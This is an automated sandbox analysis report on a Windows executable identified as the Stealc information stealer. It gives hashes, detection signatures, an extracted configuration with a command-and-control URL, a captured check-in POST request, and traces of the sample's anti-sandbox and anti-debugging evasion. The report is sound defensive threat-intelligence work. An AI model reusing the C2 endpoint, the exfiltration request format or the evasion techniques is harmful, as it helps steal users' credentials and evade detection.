Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1525234
MD5:67ba8a4a441b8c1e892ab227cc5f142a
SHA1:5cf0a0706a9db5ec122d52576479f62327a655b1
SHA256:12db50d8781fb72163f2cc3eb674b94558050eb9e965c02ea8936ed1770ca298
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6952 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 67BA8A4A441B8C1E892AB227CC5F142A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1679892855.00000000050D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6952JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6952JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.ec0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T22:50:59.767145+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.ec0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00ECC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00EC9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00EC7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00EC9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00ED8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00ED38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00ED4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00ECDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00ECE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00ED4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00ECED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EC16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00ED3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00ECF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00ECBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00ECDE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 41 33 41 41 46 35 45 32 33 36 33 38 34 38 34 36 38 37 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="hwid"40A3AAF5E2363848468766------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="build"doma------GCGHJEBGHJKEBFHIJDHC--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00EC4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 41 33 41 41 46 35 45 32 33 36 33 38 34 38 34 36 38 37 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="hwid"40A3AAF5E2363848468766------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="build"doma------GCGHJEBGHJKEBFHIJDHC--
                Source: file.exe, 00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/K
                Source: file.exe, 00000000.00000002.1720287948.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php)
                Source: file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=
                Source: file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpR
                Source: file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpn
                Source: file.exe, 00000000.00000002.1720287948.0000000000DE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37D

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129A9D90_2_0129A9D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B05F0_2_0128B05F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012943090_2_01294309
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251BD90_2_01251BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01295A650_2_01295A65
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01282ABA0_2_01282ABA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128955C0_2_0128955C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01280DD60_2_01280DD6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01296CD60_2_01296CD6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01285F310_2_01285F31
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128E7500_2_0128E750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B279D0_2_011B279D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012887E40_2_012887E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011526560_2_01152656
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130AE9C0_2_0130AE9C
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00EC45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: qtygkfie ZLIB complexity 0.9948816067950255
                Source: file.exe, 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1679892855.00000000050D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00ED8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00ED3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\R700J588.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1864704 > 1048576
                Source: file.exeStatic PE information: Raw size of qtygkfie is bigger than: 0x100000 < 0x1a1200

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.ec0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qtygkfie:EW;bnphghxp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qtygkfie:EW;bnphghxp:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00ED9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1d0281 should be: 0x1cd22a
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: qtygkfie
                Source: file.exeStatic PE information: section name: bnphghxp
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0131B93E push ebp; mov dword ptr [esp], ecx0_2_0131BBAA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012B3906 push edx; mov dword ptr [esp], eax0_2_012B397D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0134990B push 46BC0A8Ch; mov dword ptr [esp], ebp0_2_0134991C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01317171 push 7E60A1C9h; mov dword ptr [esp], edi0_2_01317189
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C2965 push 0186C1C0h; mov dword ptr [esp], edi0_2_012C29CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C2965 push ebx; mov dword ptr [esp], eax0_2_012C29EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01351955 push eax; mov dword ptr [esp], ecx0_2_01351990
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0132D156 push ebp; mov dword ptr [esp], 5D7F081Ch0_2_0132D16A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0132D156 push ebp; mov dword ptr [esp], 59ADBC45h0_2_0132D1C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013361BD push eax; mov dword ptr [esp], ebp0_2_013361F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013361BD push ebp; mov dword ptr [esp], edi0_2_01336218
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01312192 push esi; mov dword ptr [esp], ecx0_2_01312197
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01312192 push eax; mov dword ptr [esp], edx0_2_0131219B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01312192 push 164F8C61h; mov dword ptr [esp], ebx0_2_013122C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01312192 push 08AD4DE6h; mov dword ptr [esp], edi0_2_0131231B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01312192 push eax; mov dword ptr [esp], esi0_2_01312387
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013B09F7 push ebp; mov dword ptr [esp], 775B520Bh0_2_013B0B28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013B09F7 push 1B94E1D8h; mov dword ptr [esp], ebp0_2_013B0B9B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDB035 push ecx; ret 0_2_00EDB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129A9D9 push 18723EB6h; mov dword ptr [esp], ecx0_2_0129A9EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129A9D9 push ebx; mov dword ptr [esp], 037F8D09h0_2_0129AA19
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129A9D9 push 6AEDD8F4h; mov dword ptr [esp], ecx0_2_0129AA38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129A9D9 push ebx; mov dword ptr [esp], ebp0_2_0129AA4F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129A9D9 push 3A4CD654h; mov dword ptr [esp], esi0_2_0129AAA6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129A9D9 push ebp; mov dword ptr [esp], esp0_2_0129AAB5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129A9D9 push edi; mov dword ptr [esp], esi0_2_0129AB06
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129A9D9 push esi; mov dword ptr [esp], 5D571A16h0_2_0129AB54
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129A9D9 push 19EE6115h; mov dword ptr [esp], ebp0_2_0129ABCE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129A9D9 push ebx; mov dword ptr [esp], 6FFEBFF7h0_2_0129AC0F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129A9D9 push 55EB2F39h; mov dword ptr [esp], edx0_2_0129AC1C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129A9D9 push edi; mov dword ptr [esp], eax0_2_0129AC5F
                Source: file.exeStatic PE information: section name: qtygkfie entropy: 7.952733470198543

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00ED9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13362
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A034A second address: 12A034E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A034E second address: 12A0374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007FC2CCD28622h 0x0000000e jmp 00007FC2CCD28616h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129F597 second address: 129F5AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2CCC4B424h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129F87C second address: 129F880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129F880 second address: 129F897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC2CCC4B41Ch 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129F897 second address: 129F89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129F89D second address: 129F8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129F8A3 second address: 129F8BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FC2CCD28610h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
